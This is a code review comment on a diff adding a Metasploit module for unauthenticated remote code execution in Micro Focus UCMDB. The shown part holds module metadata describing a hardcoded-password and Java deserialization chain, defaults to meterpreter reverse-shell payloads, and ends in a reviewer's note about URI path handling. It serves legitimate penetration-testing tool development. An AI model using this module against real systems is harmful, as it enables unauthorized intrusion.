modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb

```diff
@@ -0,0 +1,193 @@
+      update_info(
+        info,
+        'Name' => 'Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits two vulnerabilities, that when chained allow an attacker
+          to achieve unauthenticated remote code execution in Micro Focus UCMDB.
+          UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
+          but this module can probably also be used to exploit Operations Bridge Manager
+          (containeirized) and Application Performance Management.
+          Check the advisory and module documentation for details.
+          The first vulnerability is a hardcoded password for the "diagnostics" user, which
+          allows us to login to UCMDB. The second vulnerability is a run-of-the-mill Java
+          deserialization, which can be exploited with ysoserial's CommonsBeanutils1 payload.
+          Both Windows and Linux installations are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
+            [ 'CVE', '2020-11853'],
+            [ 'CVE', '2020-11854'],
+            [ 'ZDI', '20-1287'],
+            [ 'ZDI', '20-1288'],
+          ],
+        'Privileged' => true,
+        'Platform' => %w[unix win],
+        'DefaultOptions' =>
+          {
+            'WfsDelay' => 15
+          },
+        'Targets' =>
+          # unfortunately could not find a way to determine target automatically
+          [
+            [
+              'Windows',
+              {
+                'Platform' => 'win',
+                'DefaultOptions' =>
+                { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+              },
+            ],
+            [
+              'Linux',
+              {
+                'Platform' => 'unix',
+                'Arch' => [ARCH_CMD],
+                'DefaultOptions' =>
+                # Metasploit ysoserial's Linux payloads are currently BROKEN!
+                # So we need to default to cmd/unix/generic, which is the only that works now.
+                # Once this is fixed, change the default to cmd/unix/reverse_python
+                # ... and remove this comment.
+                { 'PAYLOAD' => 'cmd/unix/generic' }
+              },
+            ]
+          ],
+        'DisclosureDate' => '2020-10-28',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptString.new('TARGETURI', [ true, 'Base UCMDB path', '/ucmdb-ui']),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri('ucmdb-api', 'connect'),
```

Comment:
This doesn't use the `TARGETURI` datastore option while other usages of `send_request_(cgi|raw)` do. It looks like the `TARGETURI` should be updated to use a default value of simply `'/'`, and then this should be:

```suggestion
        'uri' => normalize_uri(target_uri.path, 'ucmdb-api', 'connect')
```

The other two instances on L115 and L179 will need to be updated too using `... normalize_uri(target_uri.path, 'ucmdb-ui', ....)`